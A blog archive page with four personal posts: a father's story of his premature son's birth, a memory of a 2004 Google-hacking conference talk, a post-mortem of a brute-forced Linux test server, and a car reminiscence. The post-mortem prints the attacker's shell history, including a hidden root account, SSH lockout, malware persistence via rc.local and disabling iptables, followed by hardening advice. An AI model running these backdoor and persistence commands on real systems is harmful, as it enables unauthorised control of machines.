Archive | September, 2014

What It’s Like To Be The Father Of A Premature Baby (Premie)

Pregnancy itself is a roller-coaster, even the ideal pregnancy I would imagine is quite a stressful experience for the first time parents (especially the one with a tiny human growing in her belly). We honestly did not have the easiest pregnancy, at some points it was downright terrifying – especially seeing blood during the exact time when we were supposed to announce to the World that we were having a baby. The magical 3 months mark – Red tide.

And yes it happened again in May, not a good sign, but nothing we could do – nothing the Doctor could tell us..and upon reading far too much, is fairly normal (happens to about 20% of pregnant women). The only bad part, was it’s a fairly strong indicator of premature birth.

There’s 2 things in life I really strongly dislike, complaining and worrying (almost the same thing in fact..). Worry is pointless, if you can do something about it, do it. If you can’t, worrying isn’t going to change anything. Same for complaining, don’t complain, do something to change it, fix the situation, take action – don’t just whinge.

A lot of it can be alleviated by knowledge anyway, read, read, educate yourself and it becomes a lot easier to not worry (or the opposite sometimes when you read too much). Anyway, that’s my philosophy in life and I had to work extra hard to maintain it at certain points during the pregnancy, as it wasn’t an easy one in general.

On the whole it was wonderful though, Kim felt great and she was a glowing, beautiful, vibrant surprise pregnant lady (we consider a surprise mom when you see a hot chick from the back and she turns to the side or around and boom there’s a massive baby bump). She had very few serious symptoms, some morning sickness early on, no really crazy cravings, not much pain/discomfort. Other than the blood etc, it was a textbook pleasant pregnancy.

It was pretty stressful though, every day without blood was a blessing. Then things escalated fairly quickly, 11th July (around 29 weeks gestation) we had ‘The Show’ which is technically the body of the mother saying it’s ready to party, let’s get the baby out. I saw what looked an awful lot like a mucus plug (yes I Google Imaged it..I don’t recommend doing that).

This is when I started reading voraciously about all kinds of symptoms, probabilities, birth stages (micro preemies, early preemies, moderately premature etc etc), and was hoping we could make it to at least 34-35 weeks gestation as our little man would be pretty much fully developed by then and fairly well equipped to come out.

After ‘The Show’ we went to A&E and called our Doctor in to check things out, she said the cervix was a little soft and having a look at the picture of the mucus plug..she said it did very much look like a show and we needed to take precautions for premature birth – which is basically 2 steroids shots 12 hours apart to help along the lung development of the little one when he comes out.

As far as babies go, all systems are pretty much go from 28 weeks onwards, but the lungs are last to develop and be ready to take in outside air. Preemie lungs have issues due to a lack of surfactant which basically lubricates all the little tubes and stops them collapsing.

Most premature babies are born with some kind of respiratory distress (Which is why you see them on breathing apparatus). Anyway the earliest preemie stage which is unlikely to have any serious long term effects in 32 weeks, also has a 98% survival rate – which is good obviously.

Anyway after the steroid shots Kim just took it easy and was pretty much on bed rest, not moving a whole lot. We were just hoping and praying (in a non-religious way) that he would stay in as long as possible, as the last few weeks of gestation are when there is exponential growth and development of the body, brain, immune system, nervous system and much more.

So yah, July 30th I was supposed to go to the office, but Kim didn’t seem to be feeling to well, and I just had a bad feeling and thought I should stay at home. Lucky I did as the missus stayed in bed all day, she went to pee around 5pm and I heard a scream from upstairs.

I rushed up and found a wet floor..which I examined closely (yes I smelt it)…you smell it to make sure it’s not pee, to make sure it has no foul smells and you check it to make sure it’s clear and has no black/green tint. A black/green tint would indicate the baby is not coping well and needs to come out ASAP (emergency C-section).

The water had broken, but it didn’t seem to be a can read this part from Kim’s perspective too here: I have popped and this is how it went down..

Anyway, however little or much water broke (I suspected it was the hind waters, not the main sack) we rushed to the hospital and went straight into a labour room. I read up and found the probability of going into labour in the next 24 hours was 50% or higher. I was hoping we were in the other 50% that could go 4-6 weeks with a drip/leak/hind water burst as amniotic fluid does constantly regenerate and after an ultrasound the main sac was still full.

Stay positive and all that, I hung out in the hospital till about 3am then went home to get some sleep. There was no contractions or major dilation (around 1cm) so we were hopeful that he could stay in until at least 36 weeks.

But no, he wasn’t having any of it. I got a panicked call from Kim around 10am saying it was on, she was having major contractions and they’d started at about 5.30am and were getting closer and stronger.

I decided I should probably go into the hospital, so I packed the bag full of stuff we might need and off I went.

It was all very sudden, we seriously had nothing ready – we had a stroller and a car seat I bought because I saw the exact model we wanted on sale. But literally nothing else, no clothes, no diapers, no cot, nothing.

I got to the hospital and Kim was already super drowsy from the gas and air she was sucking on like a crack pipe, she wouldn’t let it go. I have to say, that contraction business looks bloody painful. By about 11am she was screaming for an epidural, but the Doctor said it was too late, she was already 6cm dilated (so 60% of the way there), her contractions were too close together and she was progressing that fast it was going to be over soon anyway.

She was grabbing my hand so hard my fingers almost dropped off (ribena purple they were), but hey, I was happy to bear that rather than pooping out a 2kg human from any of my body orifices.

Things went pretty fast and our son was born pretty smoothly at 1.52pm July 31st 2014 without complications at 32 weeks 4 days (other than him being almost 8 weeks early) his due date was September 22nd. So yah, he was supposed to be born yesterday (relative to when the this post was written).

But as someone so wonderfully put it, this way we get to spend an extra 2 months with him!

Seeing your wife give birth naturally (or even cesarean I would imagine) is not an experience for the faint hearted, government hospitals no longer let the fathers be present during birth as they just don’t have enough resources to deal with all the fainting/puking etc.

Thankfully my constitution is ok I think as I managed to stay concious through-out the entire thing, and didn’t puke and even took some pictures of ‘that’ moment. Although I wasn’t exactly looking directly, so I think they are blur/overexposed haha.

This is how he looked when he was born, covered in the waxy vernix layer, goo and blood having any residual amniotic fluid/gunk sucked out of his nose/mouth with a tube wrapped in a plastic bag to keep him warm. The first thing he did? Peed on the nurse – good lad! Not exactly cute at this stage tho.

32 Week Old Premature Baby

Kim was fine afterwards just tired, she had a sleep and I went to see baby Liam in NICU (neonatal intensive care unit) where we spent many hours for the next 3 and a half weeks. More about that later, I took her up to see him the same day so they could meet the day he was born. We couldn’t hold him yet though as he was still on the CPAP machine (Continuous Positive Airway Pressure) as he did have some respiratory distress.

So the first time mommy and me could hold him was the first day after his birth. He even opened his eyes a bit and grabbed my finger like a little boss, we were so proud that he was already off the CPAP and onto the regular nasal prongs. Far cuter, like a little wrinkly old man.

32 Week Preemie

So yah, that’s the story of our pregnancy and birth from my perspective, and the first thoughts/feeling of being the father of a premature baby. My #32weeker 馃檪

If you want to see far too much of him, just follow me on Instagram @ShaolinTiger and his Mommy at @Kimberzilla.

Tags: , , , , , , , , , ,

Continue Reading 2 CommentsChildren, Family

Advanced Information Gathering AKA Google Hacking at HITB 2004

So this was the first real talk I gave, I’d just moved to Malaysia not long beforehand and I’d started work at NSS as the lead for the penetration testing team. We were a sponsor of Hack in the Box 2004 so we got a speakers slot, but it couldn’t be a product/company pitch it had to be a proper infosec/technical talk which passed the regular CFP (Call for paper) requirements.

It was decided that I give the talk..I was very nervous as you can imagine, even back then it was rather a large conference, and this was my first real shot at talking. Looking back at the slides 10 years later though, I think I did a pretty good – much of the information is still relevant today.

And when I gave the talk the room was packed, people were standing and listening. I think because it was actually one of the less technical talks, more people could enjoy it – it went down really well. The subject was something I did at work, and often the first stage in a penetration test – information gathering. Arguably it’s also the most important phase as it gives you all the entry points and people to target in later phases. The hot keywords at that time were Google Hacking and the GHDB (Google Hacks Database).

Information Gathering AKA Google Hacking

It was about 6 years after this that I gave me next talk, not sure why – perhaps just lack of opportunity. I also did an interview with The Star afterwards titled Guarding against Google hacking, where I met Chris Chong.

Google Hacking - The Star

The talk covers the lesser known aspects of Google, tools such as Athena and Sitedigger and the amount of random misconfiguration that can be found with a little careful search engine manipulation. Other useful public databases will be covered with some details on how to leverage the maximum amount of detail on any given target.

Also an introduction to the Google API and how it can be used or abused during a penetration test or hack attempt. This presentation will include a live demonstration in which the above techniques will used to gather coveted information about both random and targeted organizations.

So here are the slides:

And the video (yah we had recordings back then, shared via Torrent!):


You can see all my talks given here.

Tags: , , , , , , , , , ,

Continue Reading No CommentsHacking & Infosec

An Anatomy Of A Hack – Weak ROOT Password

So a peaceful Sunday night, I get an odd bandwidth warning for a development/testing server that a developer recently created. It was doing some fairly immense traffic, peaking at 80mb a second and averaging about 8mb/s – definitely not normal.

Image 2014-08-31 at 8.42.18 PM

I tried to access the server via SSH but couldn’t connect at all, port 22 was connection reset by peer (which indicates a block or drop) and our normal port wasn’t responding at all.

I accessed the server via the Linode LISH console, but it wasn’t accepting any of our secure passwords, so I shut it down and used the Linode manager to reset the root password. This then allowed me to boot it up and access it via LISH with the root user.

What I discovered next was the reason why I couldn’t SSH in either on port 22 the default port, or our regular SSH port (which is not 22). I could see from these lines in the .bash_history for root that SSH had been blocked for everyone except 2 IP addresses.

Which would prevent any SSH access at all.

So they logged in, created a user called restart, blocked everyone but 2 IP addresses from accessing via SSH, then downloaded a piece of malware (or what I assume to be a botnet client) from the first IP address

Then they ran this, and added it to /etc/rc.local to make sure it runs on restart. Here’s the full history:

1 w
2 uname -a
3 ethtool eth0
4 ifconfiog
5 ifconfig
6 last
7 useradd -g 0 -u 0 -o restart
8 echo restart:restart |chpasswd
9 echo "sshd:" >> /etc/hosts.allow
10 echo "sshd:" >> /etc/hosts.allow
11 echo "sshd:ALL" >> /etc/hosts.deny
12 cd /tmp/scp
13 ls
14 chmod 777 *
15 ./x 5.153
16 ls
17 chmod 777 *
18 ./x 5.153
19 cd /etc
20 wget
21 chmod 0755 com
22 ./com &
23 chattr +i com
24 echo "cd /root/">>/etc/rc.local
25 echo "./com&">>/etc/rc.local
26 echo "/etc/init.d/iptables stop">>/etc/rc.local

I uploaded the malware to VirusTotal to scan it and see what it turned up:

VirusTotal Scan

The only decent description I found was from Telus:

Backdoor.Linux.Ganiw.A is a Backdoor and Bot agent that targets the Linux platform. The malware contacts a remote server, identifying itself, and sending system information. In addition, it receives control commands to perform various nefarious activities on the infected system. Moreover, the malware has the capabilities to embark on different types of DoS attacks. To survive a system reboot, it adds an entry to the initialization directory “/etc/init.d”.

As for the actual entry, it seems like the password was popped by a different IP address (Also from China), and then later on the same day, it was logged into by our main IP address

Aug 30 01:46:43 li737-216 sshd[20132]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:46:45 li737-216 sshd[20134]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:46:47 li737-216 sshd[20134]: Failed password for root from port 4670 ssh2
Aug 30 01:46:58 li737-216 sshd[20134]: message repeated 5 times: [ Failed password for root from port 4670 ssh2]
Aug 30 01:46:58 li737-216 sshd[20134]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:00 li737-216 sshd[20136]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:01 li737-216 sshd[20136]: Failed password for root from port 4526 ssh2
Aug 30 01:47:12 li737-216 sshd[20136]: message repeated 5 times: [ Failed password for root from port 4526 ssh2]
Aug 30 01:47:12 li737-216 sshd[20136]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:14 li737-216 sshd[20138]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:15 li737-216 sshd[20138]: Failed password for root from port 3781 ssh2
Aug 30 01:47:25 li737-216 sshd[20138]: message repeated 5 times: [ Failed password for root from port 3781 ssh2]
Aug 30 01:47:25 li737-216 sshd[20138]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:27 li737-216 sshd[20140]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:29 li737-216 sshd[20140]: Failed password for root from port 4405 ssh2
Aug 30 01:47:39 li737-216 sshd[20140]: message repeated 5 times: [ Failed password for root from port 4405 ssh2]
Aug 30 01:47:39 li737-216 sshd[20140]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:41 li737-216 sshd[20144]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:44 li737-216 sshd[20144]: Failed password for root from port 1662 ssh2
Aug 30 01:47:54 li737-216 sshd[20144]: message repeated 5 times: [ Failed password for root from port 1662 ssh2]
Aug 30 01:47:54 li737-216 sshd[20144]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:55 li737-216 sshd[20146]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:57 li737-216 sshd[20146]: Failed password for root from port 4220 ssh2
Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from port 4220 ssh2

Then the login:

Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from port 4220 ssh2
Aug 30 10:17:56 li737-216 sshd[21293]: Accepted password for root from port 3117 ssh2

As a rule I disable root login via SSH, move it to a different port (not 22), disable password based logins, and use a limited list of users that can access SSH. This makes it pretty secure and can be done with the following SSH settings:

Port 888
PermitRootLogin no
PasswordAuthentication no

Then restart SSHd of course. Generally choose a port below 1024, as then it’s still a privileged port and can’t be hijacked by a non-root user (for the paranoid).

This server was only 11 days old, fortunately it has nothing important on it and doesn’t have access to anything else. Just be warned, even if you are disabling root login later, put a secure password in from the you might forget about the server for a while.

And then it’ll get owned by some Chinese hacker and turned into part of their botnet for hire.

There’s really not ever any excuse to have a weak root password.

Tags: , , , , , , , , ,

Continue Reading 2 CommentsHacking & Infosec

Oldskool Car Porn: The 1990 Lotus Carlton

I can never forget this car, seriously. My uncle drove a lot for work, I never knew exactly what he did, but he was the first person I knew that owned a laptop. He worked in some kind of manufacturing industry and was possibly a rep/salesman.

Which suits this car, well the original version anyway – the rather boring Vauxhall Carlton (along with the Ford Sierra) was a stock 90s salesman car.

1986 Vauxhall Carlton

Certainly not the most exciting car on the block. Until 1990 anyway.

I remember my uncle was looking for a new car and I happened to join him as he’d found a Lotus Carlton he’d like to look at, he didn’t know much about the car, and well nor did I. There wasn’t a whole lot of Internet back then, and there certainly wasn’t the abundance of information on sites like Wikipedia. It just so happened the car he wanted to look at was near where I lived, so he was coming down from Birmingham to have a look. I’d guess this was probably around 1992-1994 period, so the car was likely new, or barely used (1-2 years old).

When I saw it, I was that it? I was pretty underwhelmed to be honest. For a 拢48,000 car (which was an enormous amount of money back then).

Lotus Carlton

Even the interior was kind of drab, dull and plasticy. It just had the odd Lotus emblem here and there.

Lotus Carlton Interior

Little did I realise this was a 377bhp, 3.6L twin turbo BEAST which could reach 100mph (160km/h) in less than 17 seconds. So we sat it in, took it for a test drive. It seemed fairly ordinary as we tootled around, then we reached the sliproad to the motorway.

We weren’t going slow, my uncle was in third gear as he reached the merge and he accelerated hard to pull onto the motorway at a decent speed (as you would)..the car span its wheels like a drag bike on a leash.

And once it found grip…it pressed my head so hard into the back of the seat I thought my eyeballs were going to collapse. It was quite an eye watering ride.

And yah, at that point I realised this car was really something special. I read whatever I could about it and was amazed to find that it could outperform the top supercars of that era like the Ferrari Testarossa which could do 0-60mp/h in only 5.3 seconds and had a top speed of 180mph (only 3 mph more than the Carlton!).

For a 4 door sedan..full of people, speeding along like a bullet train. Quite a crazy (and scary) proposition). Also the fact that it was a target for car thieves and criminals as the police didn’t have any cars fast enough to chase it made it a little unpractical.

Sadly my uncle didn’t buy the car, so I didn’t get to sit in it (or any other) ever again. There was only 320 Lotus Carlton’s released in the UK, so it is a rare car. Even now, 20+ years later they are fetching good money for mint condition examples (拢12-20,000).

There is a modern day equivalent or a spiritual successor (in some ways), the Vauxhall VXR8.

But yah, something I still remember so vividly from my younger years. Some videos for reference..

Fifth Gear Vauxhall VXR8 vs Lotus Carlton

Top Gear Lotus Carlton

Autocar heroes: Lotus Carlton video review

Tags: , , , , , , , , ,

Continue Reading No CommentsCars/Motorsport